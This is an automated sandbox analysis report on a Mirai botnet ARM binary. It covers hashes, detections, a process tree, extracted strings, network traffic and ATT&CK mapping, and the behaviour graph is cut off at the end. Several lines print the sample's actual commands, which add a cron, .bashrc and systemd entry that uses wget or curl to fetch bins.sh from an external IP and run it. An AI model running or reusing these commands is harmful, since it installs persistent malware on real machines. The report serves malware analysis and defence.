Edit tour

Linux Analysis Report
armv5l.elf

Overview

General Information

Sample name:armv5l.elf
Analysis ID:1646590
MD5:2eb05c82dd867d19f432722b6393620a
SHA1:83883d2885e8c43892b39d7b9a96c02aa25cc8b4
SHA256:11335d592783cdd2847de8cafab26385c08f710e1ff5c98217fba94ab53029e4
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:80
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1646590
Start date and time:2025-03-24 06:32:22 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 2s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:armv5l.elf
Detection:MAL
Classification:mal80.troj.linELF@0/52@2/0
  • VT rate limit hit for: http://155.138.230.16/bins/bins.sh
Command:/tmp/armv5l.elf
PID:6228
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • armv5l.elf (PID: 6228, Parent: 6154, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/armv5l.elf
    • armv5l.elf New Fork (PID: 6231, Parent: 6228)
      • sh (PID: 6241, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 6247, Parent: 6241)
          • sh New Fork (PID: 6249, Parent: 6247)
          • crontab (PID: 6249, Parent: 6247, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 6252, Parent: 6247)
          • chmod (PID: 6252, Parent: 6247, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 6253, Parent: 6247)
          • sh (PID: 6253, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 6254, Parent: 6247)
          • curl (PID: 6254, Parent: 6247, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh
          • sh New Fork (PID: 6283, Parent: 6247)
          • chmod (PID: 6283, Parent: 6247, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
        • sh (PID: 6247, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
        • sh New Fork (PID: 6248, Parent: 6241)
        • crontab (PID: 6248, Parent: 6241, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • sh (PID: 6284, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/systemctl enable bot"
        • sh New Fork (PID: 6290, Parent: 6284)
        • systemctl (PID: 6290, Parent: 6284, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl enable bot
  • systemd New Fork (PID: 6292, Parent: 6291)
  • snapd-env-generator (PID: 6292, Parent: 6291, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • dash New Fork (PID: 6313, Parent: 4331)
  • rm (PID: 6313, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.MlUo8Pbvgs /tmp/tmp.yOIm4cNLGC /tmp/tmp.vogTzgA787
  • dash New Fork (PID: 6314, Parent: 4331)
  • cat (PID: 6314, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.MlUo8Pbvgs
  • dash New Fork (PID: 6315, Parent: 4331)
  • head (PID: 6315, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6316, Parent: 4331)
  • tr (PID: 6316, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6317, Parent: 4331)
  • cut (PID: 6317, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6318, Parent: 4331)
  • cat (PID: 6318, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.MlUo8Pbvgs
  • dash New Fork (PID: 6319, Parent: 4331)
  • head (PID: 6319, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6320, Parent: 4331)
  • tr (PID: 6320, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6321, Parent: 4331)
  • cut (PID: 6321, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6322, Parent: 4331)
  • rm (PID: 6322, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.MlUo8Pbvgs /tmp/tmp.yOIm4cNLGC /tmp/tmp.vogTzgA787
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
armv5l.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    6233.1.00007f0a20017000.00007f0a2002b000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      6231.1.00007f0a20017000.00007f0a2002b000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        6228.1.00007f0a20017000.00007f0a2002b000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: armv5l.elfAvira: detected
          Source: armv5l.elfVirustotal: Detection: 30%Perma Link
          Source: armv5l.elfReversingLabs: Detection: 41%
          Source: unknownHTTPS traffic detected: 54.171.230.55:443 -> 192.168.2.23:33606 version: TLS 1.2
          Source: armv5l.elfString: /proc//exedvrHelper/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/stat /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv5l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetdt
          Source: armv5l.elfString: /bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
          Source: armv5l.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca
          Source: .bashrc.13.drString: /bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
          Source: bot.service.13.drString: ExecStart=/bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"

          Networking

          barindex
          Source: global trafficTCP traffic: 155.138.230.16 ports 1290,0,1,2,80,9
          Source: global trafficTCP traffic: 192.168.2.23:59752 -> 155.138.230.16:1290
          Source: /tmp/armv5l.elf (PID: 6228)Socket: 127.0.0.1:4161Jump to behavior
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
          Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: api.znet.homes
          Source: tmp.8poPZC.22.drString found in binary or memory: http://155.138.230.16/bins/bins.sh
          Source: bot.service.13.drString found in binary or memory: http://155.138.230.16/bins/bins.sh;
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
          Source: unknownHTTPS traffic detected: 54.171.230.55:443 -> 192.168.2.23:33606 version: TLS 1.2
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: /proc//exedvrHelper/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/stat /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv5l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetdt
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: /tmp/armv5l.elf (PID: 6233)SIGKILL sent: pid: 6233, result: unknownJump to behavior
          Source: classification engineClassification label: mal80.troj.linELF@0/52@2/0

          Persistence and Installation Behavior

          barindex
          Source: /bin/sh (PID: 6249)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
          Source: /bin/sh (PID: 6248)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
          Source: /tmp/armv5l.elf (PID: 6231)File written: /root/.bashrcJump to behavior
          Source: /usr/bin/crontab (PID: 6248)File: /var/spool/cron/crontabs/tmp.8poPZCJump to behavior
          Source: /usr/bin/crontab (PID: 6248)File: /var/spool/cron/crontabs/rootJump to behavior
          Source: /tmp/armv5l.elf (PID: 6231)File: /root/.bashrcJump to behavior
          Source: /bin/curl (PID: 6254)Directory: /root/.curlrcJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/6231/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/6233/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1582/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1582/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1582/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/3088/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/3088/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/3088/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/230/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/230/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/230/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/110/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/110/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/110/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/231/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/231/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/231/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/111/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/111/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/111/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/232/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/232/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/232/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1579/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1579/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1579/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/112/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/112/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/112/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/233/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/233/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/233/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1699/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1699/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1699/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/113/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/113/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/113/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/234/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/234/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/234/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1335/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1335/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1335/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1698/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1698/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1698/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/114/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/114/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/114/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/235/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/235/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/235/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1334/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1334/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1334/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1576/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1576/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/1576/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/2302/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/2302/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/2302/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/115/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/115/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/115/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/236/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/236/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/236/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/116/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/116/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/116/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/237/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/237/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/237/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/117/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/117/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/117/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/118/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/118/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/118/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/910/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/910/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/910/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/119/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/119/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/119/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/912/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/912/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/912/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/10/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/10/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/10/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/2307/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/2307/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/2307/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/11/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/11/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/11/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/918/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/918/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/918/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/12/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/12/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/12/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/13/statJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/13/cmdlineJump to behavior
          Source: /tmp/armv5l.elf (PID: 6233)File opened: /proc/13/fdJump to behavior
          Source: /tmp/armv5l.elf (PID: 6241)Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
          Source: /tmp/armv5l.elf (PID: 6284)Shell command executed: sh -c "/bin/systemctl enable bot"Jump to behavior
          Source: /bin/sh (PID: 6252)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
          Source: /bin/sh (PID: 6283)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
          Source: /usr/bin/dash (PID: 6313)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.MlUo8Pbvgs /tmp/tmp.yOIm4cNLGC /tmp/tmp.vogTzgA787Jump to behavior
          Source: /usr/bin/dash (PID: 6322)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.MlUo8Pbvgs /tmp/tmp.yOIm4cNLGC /tmp/tmp.vogTzgA787Jump to behavior
          Source: /bin/sh (PID: 6290)Systemctl executable: /bin/systemctl -> /bin/systemctl enable botJump to behavior
          Source: /tmp/armv5l.elf (PID: 6239)Sleeps longer then 60s: 60.0sJump to behavior
          Source: /tmp/armv5l.elf (PID: 6239)Sleeps longer then 60s: 60.0sJump to behavior
          Source: /tmp/armv5l.elf (PID: 6228)Queries kernel information via 'uname': Jump to behavior
          Source: armv5l.elf, 6233.1.00007ffdeeb77000.00007ffdeeb98000.rw-.sdmpBinary or memory string: /tmp/qemu-open.u91yqw
          Source: armv5l.elf, 6233.1.00007ffdeeb77000.00007ffdeeb98000.rw-.sdmpBinary or memory string: LV/tmp/qemu-open.u91yqw@9
          Source: armv5l.elf, 6228.1.0000564c03550000.0000564c036a4000.rw-.sdmp, armv5l.elf, 6231.1.0000564c03550000.0000564c036a4000.rw-.sdmp, armv5l.elf, 6233.1.0000564c03550000.0000564c036a4000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
          Source: armv5l.elf, 6228.1.00007ffdeeb77000.00007ffdeeb98000.rw-.sdmp, armv5l.elf, 6231.1.00007ffdeeb77000.00007ffdeeb98000.rw-.sdmp, armv5l.elf, 6233.1.00007ffdeeb77000.00007ffdeeb98000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
          Source: armv5l.elf, 6228.1.00007ffdeeb77000.00007ffdeeb98000.rw-.sdmp, armv5l.elf, 6231.1.00007ffdeeb77000.00007ffdeeb98000.rw-.sdmp, armv5l.elf, 6233.1.00007ffdeeb77000.00007ffdeeb98000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/armv5l.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/armv5l.elf
          Source: armv5l.elf, 6228.1.0000564c03550000.0000564c036a4000.rw-.sdmp, armv5l.elf, 6231.1.0000564c03550000.0000564c036a4000.rw-.sdmp, armv5l.elf, 6233.1.0000564c03550000.0000564c036a4000.rw-.sdmpBinary or memory string: LV!/etc/qemu-binfmt/arm
          Source: armv5l.elf, 6231.1.00007ffdeeb77000.00007ffdeeb98000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: armv5l.elf, type: SAMPLE
          Source: Yara matchFile source: 6233.1.00007f0a20017000.00007f0a2002b000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6231.1.00007f0a20017000.00007f0a2002b000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6228.1.00007f0a20017000.00007f0a2002b000.r-x.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: armv5l.elf, type: SAMPLE
          Source: Yara matchFile source: 6233.1.00007f0a20017000.00007f0a2002b000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6231.1.00007f0a20017000.00007f0a2002b000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6228.1.00007f0a20017000.00007f0a2002b000.r-x.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information2
          Scripting
          Valid Accounts1
          Scheduled Task/Job
          1
          Unix Shell Configuration Modification
          1
          Unix Shell Configuration Modification
          1
          Virtualization/Sandbox Evasion
          1
          OS Credential Dumping
          11
          Security Software Discovery
          Remote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Systemd Service
          1
          Systemd Service
          1
          File and Directory Permissions Modification
          LSASS Memory1
          Virtualization/Sandbox Evasion
          Remote Desktop ProtocolData from Removable Media1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Scheduled Task/Job
          1
          Scheduled Task/Job
          1
          Hidden Files and Directories
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCron2
          Scripting
          Login Hook1
          File Deletion
          NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
          Application Layer Protocol
          Traffic DuplicationData Destruction
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1646590 Sample: armv5l.elf Startdate: 24/03/2025 Architecture: LINUX Score: 80 51 109.202.202.202, 80 INIT7CH Switzerland 2->51 53 91.189.91.42, 443 CANONICAL-ASGB United Kingdom 2->53 55 3 other IPs or domains 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 Yara detected Mirai 2->61 63 Connects to many ports of the same IP (likely port scanning) 2->63 10 armv5l.elf 2->10         started        12 systemd snapd-env-generator 2->12         started        14 dash rm 2->14         started        16 9 other processes 2->16 signatures3 process4 process5 18 armv5l.elf 10->18         started        file6 47 /root/.bashrc, ASCII 18->47 dropped 65 Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions 18->65 22 armv5l.elf sh 18->22         started        24 armv5l.elf sh 18->24         started        26 armv5l.elf 18->26         started        28 2 other processes 18->28 signatures7 process8 process9 30 sh crontab 22->30         started        34 sh sh 22->34         started        36 sh systemctl 24->36         started        file10 49 /var/spool/cron/crontabs/tmp.8poPZC, ASCII 30->49 dropped 69 Sample tries to persist itself using cron 30->69 71 Executes the "crontab" command typically for achieving persistence 30->71 38 sh crontab 34->38         started        41 sh chmod 